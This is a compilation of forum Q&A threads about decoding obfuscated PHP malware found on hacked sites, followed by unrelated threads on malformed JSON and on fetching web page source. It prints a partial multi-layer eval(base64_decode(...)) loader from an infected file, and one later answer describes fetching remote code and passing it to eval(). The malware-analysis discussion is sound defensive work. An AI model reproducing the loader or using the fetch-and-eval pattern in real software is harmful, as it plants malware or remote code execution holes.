Eval PHP Hack Cannot decode code - php

I Have read a lot on the normal php eval with the base64_encoder and was able to decode much of the infected php files.
With that said, I have this one file that does not follow standard eval call and I would like some help from the community.
Can anyone decode and/or tell me whats happening in the code?
<?php /*vg!*/eval/*E}--oP8*/(/*pxHO*/base64_decode/*vgKGm*/(/*0%C*/'LypPSnBvKi9ldmFsLypGUSZRX00qLygvKk56SiovYmFzZTY0X2RlY29kZS8qPDU+cyovKC8qTVl5YnMqLydMeW91U
OHFKMk00SjBvcScvKlJrSCEqLy4vKk41JjkqLydMeVJmVWtW'/*Ju%:AN*/./*0\`a Z=*/'UlZVVlRWQzhxUUNoZGF5b3ZXeThxTCcvKjw8J3guaCovLi8qbixXKi8nV1JXZXpKSFB6QXFMeWRqYmljdktpMX
J2tYKi8vKmsmViovKS8qMWdFVyovLyo8OHhObSovOy8qXW8/Ki8='/*L,}I*/)/*8Oyj*//*uEGgU*/)/*+LT*//*Q?.e*/;/*oGCkBv*/ ?>

If you go all the way down the rabbit hole, you get the following command.
If you open the code up in a visual editor, you'll see there are a lot of comments. Remove those, and you'll see that it's a bas64 encoded string.
Decode that, and you'll see more of the same.
Keep removing comments and concatenating strings and after about 3 levels, you get to this point.

It's just a bunch of PHP comments in there, e.g. from the first line:
<?php /*vg!*/eval/*E}--oP8*/(/*pxHO*/base64_decode/*vgKGm*/(/*0%C*/'LypPSnB etc...
^^^^^^^ ^^^^^^^^^^^ ^^^^^^^^ ^^^^^^^^^ ^^^^^^^--comments
is really just
<?php eval(base64_decode('LyPSnB etc...


Decode an Encrypted PHP File Assistance

I have a file that I'm trying to decode but I'm not sure the best way to go about doing it. I've tried putting it through a few online tools but haven't had much luck...the code looks like this:
In all my playing I managed to extract the following with a php script:
Could someone point me in the right direction on going about this process? Any help would be appreciated. :)
The "jumbled code" is gzipped, base64-encoded, reversed PHP code that is almost certainly malicious.
Replace eval with echo and see what it gives you, that's what the code that is trying to run is.

PHP: How to decode eval()?

I just noticed today that I have got lots of spam links in my wordpress blog. I just found a file which contains
<?php eval (chr(101).chr(114)...
Its very very long string. Can someone tell me how can I decode this to see what it does? So that I can try to remove the spam links?
Just replace eval by echo and have a look at the generated output
<?php echo (chr(101).chr(114)...
Instead of executing (eval) you can just echo out what it says, preferrably with htmlspecialchars if you execute it via browser:
<?php echo htmlspecialchars(chr(101)...
odds are though that you won't see anything understandable, since it is probably encoded in more ways than one.
Simply replace eval with echo:
<?php echo (chr(101).chr(114)...
Besides that, you most likely need to reinstall whatever you have on your webspace as you obviously have been hacked. Ensure that you use the most recent version of Wordpress and all other software you are running to prevent this from happening again.

Not able to parse this json

I am trying to parse the json output from
And my php json_decode returns a NULL
I am not sure where the issue is, I tried running a small subset of the data through JSONLint and it validated the json.
Any Ideas?
The error is in this section:
"service_name":"Outdoor Electric System Complaint",
"brief_description":"Report faulty Con Edison equipment, including dangling or corroded power lines or "hot spots.""
See where it says "hot spots." in an already quoted string. Those "'s should've been escaped. Since you don't have access to edit the JSON perhaps you could do a search for "hot spots."" and replace it with \"hot spots.\"" like str_replace('"hot spots.""', '\\"hot spots.\\""\, $str); for as long as that's in there. Of course that only helps if this is a one time thing. If the site continues to make errors in their JSON output you'll have to come up with something more complex.
What I did to identify the errors in the JSON ...
Since faulty quoting is the first thing to look for, I downloaded the JSON to a text file, opened in a text editor (I used vim but any full featured editor would do), ran a search and replace that removed all characters except double-quote and looked at the result. It was clear that correct lines should have 4 double-quotes so I simply searched for 5 double-quotes together and found the first bad line. I noted the line number and then undid the search and replace to get the original file back and looked at that line. This gives you what you need to get the developers of the API to fix the JSON.
Writing code to automatically fix the bad JSON before giving it to json_decode() would be quite a bit harder but doable using techniques like those in another answer.
According to the PHP manual:
In the event of a failure to decode, json_last_error() can be used to determine the exact nature of the error.
Try calling it to see where the error is.

Is there a way to decode this PHP code?

I have this PHP code, and it appears to be obfuscated, instead of the massive line of code, I just substituted it with the word "code":
eval("?>".gzuncompress(base64_decode("code"))); ?>
Would there be any potential way of decoding said code?
Sure, just replace the eval() with echo(). Based on experience, though, the code in there will probably be obfuscated as well.
echo gzuncompress(base64_decode("code")));
And, then, use auto format feature of some IDE

Is there a php function for using the source code of another web page?

I want to create a PHP script that grabs the content of a website. So let's say it grabs all the source code for that website and I say which lines of code I need.
Is there a function in PHP that allows you too do this or is it impossible?
Disclaimer: I'm not going to use this for any illegal purposes at all and not asking you too write any code, just tell me if its possible and if you can how I'd go about doing it. Also I'm just asking in general, not for any specific reason. Thanks! :)
file('http://the.url.com') returns an array of lines from a url.
so for the 24th line do this:
$lines = file('http://www.whatever.com');
echo $lines[23];
This sounds like a horrible idea, but here we go:
Use file_get_contents() to get the file. You cannot get the source if the web server first processes it, so you may need to use an extension like .txt. Unless you password protect the file, obviously anybody can get it.
Use explode() with the \n delimiter to split the source code into lines.
Use array_slice() to get the lines you need.
eval() the code.
Note: if you just want the HTML output, then ignore the bit about the source in step 1 and obviously you can skip the whole eval() thing.
